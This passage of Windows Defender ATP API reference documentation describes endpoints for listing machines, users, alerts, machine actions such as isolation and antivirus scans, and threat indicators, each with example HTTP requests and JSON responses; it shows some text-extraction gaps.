"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines/$entity",
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"isAadJoined": true,
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2" ]
}
Get alert related user information API
Applies to:
Retrieves the user associated to a specific alert.
Permissions
Application User.Read.All 'Read user profiles'
Delegated (work or school account) User.Read.All 'Read user profiles'
NOTE
information)
HTTP request
GET /api/alerts/{id}/user
Request headers
Request body
Empty
Response
If successful and alert and a user exists - 200 OK with user in the body. If alert or user not found - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/alerts/636688558380765161_2136280442/user
Response
HTTP/1.1 200 OK
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Users/$entity",
"id": "contoso\\user1",
"firstSeen": "2018-08-02T00:00:00Z",
"lastSeen": "2018-08-04T00:00:00Z",
"mostPrevalentMachineId": null,
"leastPrevalentMachineId": null,
"logonTypes": "Network",
"logOnMachinesCount": 3,
"isDomainAdmin": false,
"isOnlyNetworkUser": null
}
Machine resource type
Applies to:
Methods
List machines machine collection List set of machine entities in the org.
Get machine machine Get a machine by its identity.
Get logged on users user collection Get the set of User that logged on to
the machine.
Get related alerts alert collection Get the set of alert entities that were
raised on the machine.
Add or Remove machine tags machine Add or Remove tag to a specific

machine.
Find machines by IP machine collection Find machines seen with IP.
Properties
id String machine identity.
computerDnsName String machine fully qualified name.
firstSeen DateTimeOffset First date and time where the machine

was observed by Windows Defender
ATP.
lastSeen DateTimeOffset Last date and time where the machine

was observed by Windows Defender
ATP.
osPlatform String OS platform.
osVersion String OS Version.
lastIpAddress String Last IP on local NIC on the machine.
lastExternalIpAddress String Last IP through which the machine

accessed the internet.
agentVersion String Version of Windows Defender ATP

agent.
osBuild Nullable long OS build number.
healthStatus Enum machine health status. Possible values

are: "Active", "Inactive",
"ImpairedCommunication",
"NoSensorData" and
"NoSensorDataImpairedCommunicatio
n"
rbacGroupId Int RBAC Group ID.
rbacGroupName String RBAC Group Name.
riskScore Nullable Enum Risk score as evaluated by Windows

Defender ATP. Possible values are:
'None', 'Low', 'Medium' and 'High'.
aadDeviceId Nullable Guid AAD Device ID (when machine is Aad

Joined).
machineTags String collection Set of machine tags.

List machines API
Applies to:
This API can do the following actions:
Retrieves a collection of machines that have communicated with Windows Defender ATP cloud on the last 30
days.
Get Machines collection API supports OData V4 queries.
The OData's Filter query is supported on: "Id", "ComputerDnsName", "LastSeen", "LastIpAddress",
"HealthStatus", "OsPlatform", "RiskScore", "MachineTags" and "RbacGroupId".
Permissions
Application Machine.Read.All 'Read all machine profiles'
NOTE
information)
Response will include only machines,that the user have access to, based on machine group settings (See Create and
HTTP request
GET https://api.securitycenter.windows.com/api/machines
Request headers

Request body
Empty
Response
If successful and machines exists - 200 OK with list of machine entities in the body. If no recent machines - 404 Not
Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/machines
Response
HTTP/1.1 200 OK
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines",
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"rbacGroupId": 140,
"riskScore": "Low",
"isAadJoined": true,
},
{
"id": "7292e4b8cb74ff1cc3d8a495eb29dc8858b732f7",
"firstSeen": "2018-07-09T13:22:45.1250071Z",
"lastSeen": "2018-07-09T13:22:45.1250071Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "192.168.12.225",
"agentVersion": "10.5820.17724.1000",
"osBuild": 17724,
"healthStatus": "Inactive",
"rbacGroupId": 140,
"riskScore": "Low",
"isAadJoined": false,
"aadDeviceId": null,
"machineTags": [ "test tag 1" ]
}
]
}
Related topics
Get machine by ID API
Applies to:
Retrieves a machine entity by ID.
Permissions
NOTE
information)
User needs to have access to the machine, based on machine group settings (See Create and manage machine groups for
more information)
HTTP request
GET /api/machines/{id}
Request headers
Request body
Empty
Response
If successful and machine exists - 200 OK with the machine entity in the body. If machine with the specified id was
not found - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07
Response
HTTP/1.1 200 OK
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machine",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"rbacGroupId": 140,
"riskScore": "Low",
}
Get machine log on users API
Applies to:
Retrieves a collection of logged on users.
Permissions
Application User.Read.All 'Read user profiles'
Delegated (work or school account) User.Read.All 'Read user profiles'
NOTE
information)
Response will include users only if the machine is visible to the user, based on machine group settings (See Create and
HTTP request
GET /api/machines/{id}/logonusers
Request headers
Request body
Empty
Response
If successful and machine exist - 200 OK with list of user entities in the body. If machine was not found - 404 Not
Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/logonusers
Response
HTTP/1.1 200 OK
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Users",
"value": [
{
"firstSeen": "2018-08-02T00:00:00Z",
"lastSeen": "2018-08-04T00:00:00Z",
},
{
"firstSeen": "2018-08-02T00:00:00Z",
"lastSeen": "2018-08-05T00:00:00Z",
}
]
}
Get machine related alerts API
Applies to:
Retrieves a collection of alerts related to a given machine ID.
Permissions
NOTE
information)
more information)
HTTP request
GET /api/machines/{id}/alerts
Request headers
Request body
Empty
Response
If successful and machine exists - 200 OK with list of alert entities in the body. If machine was not found - 404 Not
Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/alerts
Response
HTTP/1.1 200 OK
{
"value": [
{
"id": "441688558380765161_2136280442",
"incidentId": 8633,
"severity": "Low",
}
]
}
Add or Remove Machine Tags API
Applies to:
This API adds or remove tag to a specific machine.
Permissions
NOTE
The user needs to have at least the following role permission: 'Manage security setting' (See Create and manage roles for
more information)
more information)
HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/tags
Request headers
Content-Type string application/json. Required.
Request body
Value String The tag name. Required.

Action Enum Add or Remove. Allowed values are:

'Add' or 'Remove'. Required.
Response
If successful, this method returns 200 - Ok response code and the updated Machine in the response body.
Example
Request
Here is an example of a request that adds machine tag.

NOTE
POST https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/tags
{
"Value" : "test Tag 2",
"Action": "Add"
}
Response
HTTP/1.1 200 Ok
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machine/$entity",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"rbacGroupId": 140,
"riskScore": "Low",
}
To remove machine tag, set the Action to 'Remove' instead of 'Add' in the request body.
Find machines by internal IP API
Applies to:
Find machines seen with the requested internal IP in the time range of 15 minutes prior and after a given
timestamp
The given timestamp must be in the past 30 days.
Permissions
NOTE
information)
Response will include only machines,that the user have access to, based on machine group settings (See Create and
HTTP request
GET /api/machines/findbyip(ip='{IP}',timestamp={TimeStamp})
Request headers
Request body
Empty
Response
If successful and machines were found - 200 OK with list of the machines in the response body. If no machine
found - 404 Not Found. If the timestamp is not in the past 30 days - 400 Bad Request.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/machines/findbyip(ip='10.248.240.38',timestamp=2018-09-
22T08:44:05Z)
Response
HTTP/1.1 200 OK
{
"value": [
{
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-09-22T08:55:03.7791856Z",
"osVersion": "10.0.0.0",
"lastIpAddress": "10.248.240.38",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"rbacGroupId": 140,
"riskScore": "Low",
}
]
}
MachineAction resource type
Applies to:
List MachineActions Machine Action List Machine Action entities.
Get MachineAction Machine Action Get a single Machine Action entity.
Collect investigation package Machine Action Collect investigation package from a

machine.
Get investigation package SAS URI Machine Action Get URI for downloading the
investigation package.
Isolate machine Machine Action Isolate machine from network.
Release machine from isolation Machine Action Release machine from Isolation.
Restrict app execution Machine Action Restrict application execution.
Remove app restriction Machine Action Remove application execution

restriction.
Run antivirus scan Machine Action Run an AV scan using Windows

Defender (when applicable).
Offboard machine Machine Action Offboard machine from Windows

Defender ATP.
Properties
id Guid Identity of the Machine Action entity.
type Enum Type of the action. Possible values are:

"RunAntiVirusScan", "Offboard",
"CollectInvestigationPackage", "Isolate",
"Unisolate", "StopAndQuarantineFile",
"RestrictCodeExecution" and
"UnrestrictCodeExecution"
requestor String Identity of the person that executed

the action.
requestorComment String Comment that was written when

issuing the action.
status Enum Current status of the command.

Possible values are: "Pending",
"InProgress", "Succeeded", "Failed",
"TimeOut" and "Cancelled".
machineId String Id of the machine on which the action

was executed.
creationDateTimeUtc DateTimeOffset The date and time when the action was
created.
lastUpdateTimeUtc DateTimeOffset The last date and time when the action
status was updated.
relatedFileInfo Class Contains two Properties. 1) string

'fileIdentifier' 2) Enum
'fileIdentifierType' with the possible
values: "Sha1" ,"Sha256" and "Md5".
List MachineActions API
Applies to:
Gets collection of actions done on machines.
Get MachineAction collection API supports OData V4 queries.
The OData's Filter query is supported on: "Id", "Status", "MachineId", "Type", "Requestor" and
"CreationDateTimeUtc".
Permissions
NOTE
information)
HTTP request
GET https://api.securitycenter.windows.com/api/machineactions
Request headers
Request body
Empty
Response
If successful, this method returns 200, Ok response code with a collection of machineAction entities.
Example 1
Request
Here is an example of the request on an organization that has three MachineActions.

NOTE
GET https://api.securitycenter.windows.com/api/machineactions
Response
HTTP/1.1 200 Ok
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions",
"value": [
{
"id": "69dc3630-1ccc-4342-acf3-35286eec741d",
"type": "CollectInvestigationPackage",
"requestor": "Analyst@contoso.com",
"requestorComment": "test",
"status": "Succeeded",
"machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
"creationDateTimeUtc": "2018-12-04T12:43:57.2011911Z",
"lastUpdateTimeUtc": "2018-12-04T12:45:25.4049122Z",
"relatedFileInfo": null
},
{
"id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
"type": "RunAntiVirusScan",
"requestorComment": "Check machine for viruses due to alert 3212",
},
{
"id": "44cffc15-0e3d-4cbf-96aa-bf76f9b27f5e",
"type": "StopAndQuarantineFile",
"relatedFileInfo": {
"fileIdentifier": "a0c659857ccbe457fdaf5fe21d54efdcbf6f6508",
"fileIdentifierType": "Sha1"
}
}
]
}
Example 2
Request
Here is an example of a request that filters the MachineActions by machine ID and shows the latest two
MachineActions.
GET https://api.securitycenter.windows.com/api/machineactions?$filter=machineId eq
'f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f'&$top=2
Response

NOTE
HTTP/1.1 200 Ok
{
"value": [
{
"id": "69dc3630-1ccc-4342-acf3-35286eec741d",
},
{
"id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
}
]
}
Related topics
Get machineAction API
Applies to:
Get action performed on a machine.
Permissions
NOTE
information)
HTTP request
GET https://api.securitycenter.windows.com/api/machineactions/{id}
Request headers
Request body
Empty
Response
If successful, this method returns 200, Ok response code with a Machine Action entity. If machine action entity with
the specified id was not found - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/machineactions/2e9da30d-27f6-4208-81f2-9cd3d67893ba
Response
HTTP/1.1 200 Ok
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions/$entity",
"id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
}
Collect investigation package API
Applies to:
Collect investigation package from a machine.
Permissions
Application Machine.CollectForensics 'Collect forensics'
Delegated (work or school account) Machine.CollectForensics 'Collect forensics'
NOTE
The user needs to have at least the following role permission: 'Alerts Investigation' (See Create and manage roles for more
information)
The user needs to have access to the machine, based on machine group settings (See Create and manage machine groups
for more information)
HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/collectInvestigationPackage
Request headers
Request body

Comment String Comment to associate with the action.

Required.
Response
If successful, this method returns 201 - Created response code and Machine Action in the response body.
Example
Request

NOTE
POST
https://api.securitycenter.windows.com/api/machines/fb9ab6be3965095a09c057be7c90f0a2/collectInvestigationPackag
e
{
"Comment": "Collect forensics due to alert 1234"
}
Response
HTTP/1.1 201 Created

{
"id": "c9042f9b-8483-4526-87b5-35e4c2532223",
"requestorComment": " Collect forensics due to alert 1234",
}
Get package SAS URI API
Applies to:
Get a URI that allows downloading of an investigation package.
Permissions
Application Machine.CollectForensics 'Collect forensics'
Delegated (work or school account) Machine.CollectForensics 'Collect forensics'
NOTE
information)
HTTP request
GET https://api.securitycenter.windows.com/api/machineactions/{machine action id}/getPackageUri
Request headers
Request body
Empty
Response
If successful, this method returns 200, Ok response code with object that holds the link to the package in the
“value” parameter. This link is valid for a very short time and should be used immediately for downloading the
package to a local storage.
Example
Request
GET
https://api.securitycenter.windows.com/api/machineactions/7327b54fd718525cbca07dacde913b5ac3c85673/GetPackageUr
i
Response

NOTE
HTTP/1.1 200 Ok
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Edm.String",
"value": "\"https://userrequests-
us.securitycenter.windows.com:443/safedownload/WDATP_Investigation_Package.zip?
token=gbDyj7y%2fbWGAZjn2sFiZXlliBTXOCVG7yiJ6mXNaQ9pLByC2Wxeno9mENsPFP3xMk5l%2bZiJXjLvqAyNEzUNROxoM2I1er9dxzfVeB
sxSmclJjPsAx%2btiNyxSz1Ax%2b5jaT5cL5bZg%2b8wgbwY9urXbTpGjAKh6FB1e%2b0ypcWkPm8UkfOwsmtC%2biZJ2%2bPqnkkeQk7SKMNoA
vmh9%2fcqDIPKXGIBjMa0D9auzypOqd8bQXp7p2BnLSH136BxST8n9IHR4PILvRjAYW9kvtHkBpBitfydAsUW4g2oDZSPN3kCLBOoo1C4w4Lkc9
Bc3GNU2IW6dfB7SHcp7G9p4BDkeJl3VuDs6esCaeBorpn9FKJ%2fXo7o9pdcI0hUPZ6Ds9hiPpwPUtz5J29CBE3QAopCK%2fsWlf6OW2WyXsrNR
SnF1tVE5H3wXpREzuhD7S4AIA3OIEZKzC4jIPLeMu%2bazZU9xGwuc3gICOaokbwMJiZTqcUuK%2fV9YdBdjdg8wJ16NDU96Pl6%2fgew2KYuk6
Wo7ZuHotgHI1abcsvdlpe4AvixDbqcRJthsg2PpLRaFLm5av44UGkeK6TJpFvxUn%2f9fg6Zk5yM1KUTHb8XGmutoCM8U9er6AzXZlY0gGc3D3b
QOg41EJZkEZLyUEbk1hXJB36ku2%2bW01cG71t7MxMBYz7%2bdXobxpdo%3d%3bRWS%2bCeoDfTyDcfH5pkCg6hYDmCOPr%2fHYQuaUWUBNVnXU
RYkdyOzVHqp%2fe%2f1BNyPdVoVkpQHpz1pPS3b5g9h7IMmNKCk5gFq5m2nPx6kk9EYtzx8Ndoa2m9Yj%2bSaf8zIFke86YnfQL4AYewsnQNJJh
4wc%2bXxGlBq7axDcoiOdX91rKzVicH3GSBkFoLFAKoegWWsF%2fEDZcVpF%2fXUA1K8HvB6dwyfy4y0sAqnNPxYTQ97mG7yHhxPt4Pe9YF2UPP
AJVuEf8LNlQ%2bWHC9%2f7msF6UUI4%2fca%2ftpjFs%2fSNeRE8%2fyQj21TI8YTF1SowvaJuDc1ivEoeopNNGG%2bGI%2fX0SckaVxU9Hdkh0
zbydSlT5SZwbSwescs0IpzECitBbaLUz4aT8KTs8T0lvx8D7Te3wVsKAJ1r3iFMQZrlk%2bS1WW8rvac7oHRx2HKURn1v7fDIQWgJr9aNsNlFz4
fLJ50T2qSHuuepkLVbe93Va072aMGhvr09WVKoTpAf1j2bcFZZU6Za5PxI32mr0k90FgiYFJ1F%2f1vRDrGwvWVWUkR3Z33m4g0gHa52W1FMxQY
0TJIwbovD6FaSNDx7xhKZSd5IJ7r6P91Gez49PaZRcAZPjd%2bfbul3JNm1VqQPTLohT7wa0ymRiXpSST74xtFzuEBzNSNATdbngj3%2fwV4Jes
TjZjIj5Dc%3d%3blumqauVlFuuO8MQffZgs0tLJ4Fq6fpeozPTdDf8Ll6XLegi079%2b4mSPFjTK0y6eohstxdoOdom2wAHiZwk0u4KLKmRkfYO
dT1wHY79qKoBQ3ZDHFTys9V%2fcwKGl%2bl8IenWDutHygn5IcA1y7GTZj4g%3d%3d\""
}
Isolate machine API
Applies to:
Isolates a machine from accessing external network.
NOTE
This page focuses on performing a machine action via API. See take response actions on a machine for more information
about response actions functionality via Windows Defender ATP.
Permissions
Application Machine.Isolate 'Isolate machine'
Delegated (work or school account) Machine.Isolate 'Isolate machine'
NOTE
The user needs to have at least the following role permission: 'Active remediation actions' (See Create and manage roles
HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/isolate
Request headers
Request body

Required.
IsolationType String Type of the isolation. Allowed values

are: 'Full' or 'Selective'.
IsolationType controls the type of isolation to perform and can be one of the following:
Full – Full isolation
Selective – Restrict only limited set of applications from accessing the network (see Isolate machines from the
network for more details)
Response
Example
Request

NOTE
POST https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/isolate
{
"Comment": "Isolate machine due to alert 1234",
“IsolationType”: “Full”
}
Response
{
"id": "b89eb834-4578-496c-8be0-03f004061435",
"type": "Isolate",
"requestor": "Analyst@contoso.com ",
"requestorComment": "Isolate machine due to alert 1234",
}
To unisolate a machine, see Release machine from isolation.

Release machine from isolation API
Applies to:
Undo isolation of a machine.
NOTE
Permissions
Application Machine.Isolate 'Isolate machine'
Delegated (work or school account) Machine.Isolate 'Isolate machine'
NOTE
HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/unisolate
Request headers
Request body

Required.
Response
Example
Request

NOTE
POST https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/unisolate
{
"Comment": "Unisolate machine since it was clean and validated"
}
Response
NOTE

{
"id": "09a0f91e-a2eb-409d-af33-5577fe9bd558",
"type": "Unisolate",
"requestorComment": "Unisolate machine since it was clean and validated ",
}
To isolate a machine, see Isolate machine.
Restrict app execution API
Applies to:
Restrict execution of all applications on the machine except a predefined set (see Response machine alerts for more
information)
NOTE
Permissions
Application Machine.RestrictExecution 'Restrict code execution'
Delegated (work or school account) Machine.RestrictExecution 'Restrict code execution'
NOTE
HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/restrictCodeExecution
Request headers

Request body

Required.
Response
Example
Request
POST
https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/restrictCodeExecut
ion
{
"Comment": "Restrict code execution due to alert 1234"
}
Response

NOTE

{
"id": "78d408d1-384c-4c19-8b57-ba39e378011a",
"type": "RestrictCodeExecution",
"requestorComment": "Restrict code execution due to alert 1234",
}
To remove code execution restriction from a machine, see Remove app restriction.
Remove app restriction API
Applies to:
Enable execution of any application on the machine.
NOTE
Permissions
Application Machine.RestrictExecution 'Restrict code execution'
Delegated (work or school account) Machine.RestrictExecution 'Restrict code execution'
NOTE
HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/unrestrictCodeExecution
Request headers
Request body

Required.
Response
Example
Request

NOTE
POST
https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/unrestrictCodeExe
cution
{
"Comment": "Unrestrict code execution since machine was cleaned and validated"
}
Response

{
"id": "44cffc15-0e3d-4cbf-96aa-bf76f9b27f5e",
"type": "UnrestrictCodeExecution",
"requestorComment": "Unrestrict code execution since machine was cleaned and validated ",
}
To restrict code execution on a machine, see Restrict app execution.

Run antivirus scan API
Applies to:
Initiate Windows Defender Antivirus scan on a machine.
NOTE
Permissions
Application Machine.Scan 'Scan machine'
Delegated (work or school account) Machine.Scan 'Scan machine'
NOTE
HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/runAntiVirusScan
Request headers
Content-Type string application/json
Request body

Required.
ScanType String Defines the type of the Scan. Required.
ScanType controls the type of scan to perform and can be one of the following:
Quick – Perform quick scan on the machine
Full – Perform full scan on the machine
Response
If successful, this method returns 201, Created response code and MachineAction object in the response body.
Example
Request
POST
https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/runAntiVirusScan
{
"Comment": "Check machine for viruses due to alert 3212",
“ScanType”: “Full”
}
Response

NOTE
{
"id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
}
Offboard machine API
Applies to:
Offboard machine from Windows Defender ATP.
NOTE
Permissions
Application Machine.Offboard 'Offboard machine'
Delegated (work or school account) Machine.Offboard 'Offboard machine'
NOTE
The user needs to 'Global Admin' AD role
HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/offboard
Request headers
Request body

Required.
Response
Example
Request

NOTE
POST https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/offboard
{
"Comment": "Offboard machine by automation"
}
Response

{
"id": "c9042f9b-8483-4526-87b5-35e4c2532223",
"type": "OffboardMachine",
"requestorComment": "offboard machine by automation",
}
Stop and quarantine file API
Applies to:
Stop execution of a file on a machine and delete it.
NOTE
Permissions
Application Machine.StopAndQuarantine 'Stop And Quarantine'
Delegated (work or school account) Machine.StopAndQuarantine 'Stop And Quarantine'
NOTE
HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/StopAndQuarantineFile
Request headers
Request body

Required.
Sha1 String Sha1 of the file to stop and quarantine

on the machine. Required.
Response
Example
Request
POST
https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/StopAndQuarantineF
ile
{
"Comment": "Stop and quarantine file on machine due to alert 441688558380765161_2136280442",
"Sha1": "87662bc3d60e4200ceaf7aae249d1c343f4b83c9"
}
Response

NOTE
{
"id": "141408d1-384c-4c19-8b57-ba39e378011a",
"type": "StopAndQuarantineFile",
"requestorComment": "Stop and quarantine file on machine due to alert 441688558380765161_2136280442",
"relatedFileInfo": {
"fileIdentifier": "87662bc3d60e4200ceaf7aae249d1c343f4b83c9",
"fileIdentifierType": "Sha1"
}
}
Initiate machine investigation API (Preview)
Applies to:
IMPORTANT
Initiate AutoIR investigation on a machine.
NOTE
This page focuses on performing an automated investigation on a machine. See Automated Investigation for more
information.
Limitations
1. The number of executions is limited (up to 5 calls per hour).
2. For Automated Investigation limitations, see Automated Investigation.
Permissions
NOTE
information)
HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/InitiateInvestigation
Request headers
Request body

Required.
Response
If successful, this method returns 200 OK response code with object that holds the investigation ID in the "value"
parameter. If machine was not found - 404 Not Found.
Example
Request

NOTE
POST https://api.securitycenter.windows.com/api/machines/fb9ab6be3965095a09c057be7c90f0a2/InitiateInvestigation
{
"Comment": "Initiate an investigation on machine fb9ab6be3965095a09c057be7c90f0a2"
}
Response
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Edm.Int64",
"value": 5146
}
Indicator resource type
Applies to:
List Indicators Indicator Collection List Indicator entities.
Submit Indicator Indicator Submits Indicator entity.
Delete Indicator No Content Deletes Indicator entity.
See the corresponding page in the portal:
Properties
indicatorValue String Identity of the Indicator entity.
indicatorType Enum Type of the indicator. Possible values

are: "FileSha1", "FileSha256",
"IpAddress", "DomainName" and "Url"
title String Indicator alert title.
creationTimeDateTimeUtc DateTimeOffset The date and time when the indicator

was created.
createdBy String Identity of the user/application that

submitted the indicator.
expirationTime DateTimeOffset The expiration time of the indicator
action Enum The action that will be taken if the

indicator will be discovered in the
organization. Possible values are:
"Alert", "AlertAndBlock", and "Allowed"
severity Enum The severity of the indicator. possible

values are: "Informational", "Low",
"Medium" and "High"
description String Description of the indicator.
recommendedActions String Indicator alert recommended actions.

rbacGroupNames List of strings RBAC group names where the indicator

is exposed. Empty list in case it exposed
to all groups.
Submit or Update Indicator API
Applies to:
NOTE
Currently this API is supported only for AppOnly context requests. (See Get access with application context for more
information)
Submits or Updates new Indicator entity.
Permissions
see Get started
Application Ti.ReadWrite 'Read and write Indicators'
Application Ti.ReadWrite.All 'Read and write All Indicators'
HTTP request
POST https://api.securitycenter.windows.com/api/indicators

NOTE
Request headers

Request body
indicatorValue String Identity of the Indicator entity.

Required
indicatorType Enum Type of the indicator. Possible values

are: "FileSha1", "FileSha256",
"IpAddress", "DomainName" and "Url".
Required
action Enum The action that will be taken if the

indicator will be discovered in the
organization. Possible values are: "Alert",
"AlertAndBlock", and "Allowed".
Required
title String Indicator alert title. Optional
expirationTime DateTimeOffset The expiration time of the indicator.

Optional
severity Enum The severity of the indicator. possible

values are: "Informational", "Low",
"Medium" and "High". Optional
description String Description of the indicator. Optional
recommendedActions String TI indicator alert recommended actions.

Optional
Response
If successful, this method returns 200 - OK response code and the created / updated Indicator entity in the
response body.
If not successful: this method return 400 - Bad Request / 409 - Conflict with the failure reason. Bad request
usually indicates incorrect body and Conflict can happen if you try to submit an Indicator that conflicts with an
existing Indicator type or Action.
Example
Request
POST https://api.securitycenter.windows.com/api/indicators
{
"indicatorValue": "220e7d15b0b3d7fac48f2bd61114db1022197f7f",
"indicatorType": "FileSha1",
"title": "test",
"expirationTime": "2020-12-12T00:00:00Z",
"action": "AlertAndBlock",
"severity": "Informational",
"description": "test",
"recommendedActions": "TEST"
}
Response
HTTP/1.1 200 OK
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Indicators/$entity",
"title": "test",
"creationTimeDateTimeUtc": "2018-10-24T10:54:23.2009016Z",
"createdBy": "45097602-1234-5678-1234-9f453233e62c",
"recommendedActions": "TEST",
"rbacGroupNames": []
}
List Indicators API
Applies to:
NOTE
Currently this API is supported only for AppOnly context requests. (See Get access with application context for more
information)
Gets collection of TI Indicators.

Get TI Indicators collection API supports OData V4 queries.
Permissions
see Get started
Application Ti.ReadWrite 'Read and write Indicators'
Application Ti.ReadWrite.All 'Read and write All Indicators'
HTTP request
GET https://api.securitycenter.windows.com/api/indicators

NOTE
Request headers

Request body
Empty
Response
If successful, this method returns 200, Ok response code with a collection of Indicator entities.
NOTE
If the Application has 'Ti.ReadWrite.All' permission, it will be exposed to all Indicators. Otherwise, it will be exposed only to the
Indicators it created.
Example 1:
Request
Here is an example of a request that gets all Indicators
GET https://api.securitycenter.windows.com/api/indicators
Response
HTTP/1.1 200 Ok
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Indicators",
"value": [
{
"indicatorValue": "12.13.14.15",
"indicatorType": "IpAddress",
"title": "test",
"createdBy": "45097602-1234-5678-1234-9f453233e62c",
"action": "Alert",
"recommendedActions": "test",
"rbacGroupNames": []
},
{
"title": "test",
"createdBy": "45097602-1234-5678-1234-9f453233e62c",
"rbacGroupNames": [ "Group1", "Group2" ]
}
...
]
}
Example 2:
Request
Here is an example of a request that gets all Indicators with 'AlertAndBlock' action
GET https://api.securitycenter.windows.com/api/indicators?$filter=action eq 'AlertAndBlock'
Response
HTTP/1.1 200 Ok
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Indicators",
"value": [
{
"title": "test",
"createdBy": "45097602-1234-5678-1234-9f453233e62c",
"rbacGroupNames": [ "Group1", "Group2" ]
}
...
]
}
Delete Indicator API
Applies to:
NOTE
Currently this API is only supported for AppOnly context requests. (See Get access with application context for more
information)
Deletes an Indicator entity by ID.
Permissions
see Get started
Application Ti.ReadWrite 'Read and write TI Indicators'
Application Ti.ReadWrite.All 'Read and write Indicators'
HTTP request
Delete https://api.securitycenter.windows.com/api/indicators/{id}

NOTE
Request headers
Request body
Empty
Response
If Indicator exist and deleted successfully - 204 OK without content. If Indicator with the specified id was not found
- 404 Not Found.
Example
Request
DELETE https://api.securitycenter.windows.com/api/indicators/220e7d15b0b3d7fac48f2bd61114db1022197f7f
Response
HTTP/1.1 204 NO CONTENT

Get domain related alerts API
Applies to:
Retrieves a collection of alerts related to a given domain address.
Permissions
NOTE
information)
Response will include only alerts, associated with machines, that the user have access to, based on machine group settings
(See Create and manage machine groups for more information)
HTTP request
GET /api/domains/{domain}/alerts
Request headers
HEADER VALUE
Authorization String
Request body
Empty
Response
If successful and domain exists - 200 OK with list of alert entities. If domain does not exist - 404 Not Found.
Example
Request

NOTE
GET https://api.securitycenter.windows.com/api/domains/client.wns.windows.com/alerts
Response
HTTP/1.1 200 OK
{
"value": [
{
"id": "441688558380765161_2136280442",
"incidentId": 8633,
"severity": "Low",
},
{
"id": "121688558380765161_2136280442",
"incidentId": 4123,
"severity": "Low",
}
]
}
Get domain related machines API
Applies to:
Retrieves a collection of machines that have communicated to or from a given domain address.
Permissions
NOTE
information)
Response will include only machines that the user can access, based on machine group settings (See Create and manage
machine groups for more information)
HTTP request
GET /api/domains/{domain}/machines
Request headers
Request body
Empty
Response
